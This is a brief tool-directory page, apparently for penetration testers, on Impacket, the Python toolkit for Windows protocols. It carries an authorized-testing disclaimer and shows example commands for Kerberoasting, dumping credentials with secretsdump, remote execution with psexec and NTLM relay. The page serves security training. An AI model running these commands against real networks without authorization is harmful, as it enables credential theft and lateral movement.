All tools

Active Directory

Impacket

Python collection for Windows network protocols (SMB, WMI, Kerberos, etc.).

intermediate
Linux
Windows
Enumeration
Exploitation
Lateral Movement
Post-Exploitation

Authorized testing only. Practice on systems you own, isolated labs, or targets with written permission. Unauthorized access is illegal.

When

Anything involving Windows/AD auth abuse in labs and authorized tests.

How

Use scripts like secretsdump, psexec, wmiexec, GetUserSPNs, ntlmrelayx.

Why

Core AD offensive toolkit every pentester must know.

Commands & usage

impacket-GetUserSPNs domain.local/user:Pass -dc-ip 10.0.0.10 -request
impacket-secretsdump domain/user:Pass@10.0.0.10
impacket-psexec domain/user:Pass@10.0.0.20
impacket-ntlmrelayx -tf targets.txt -smb2support

Commands are educational examples. Adapt hosts, paths, and rates to your authorized scope.

Tags

ad
windows
essential

Related in Active Directory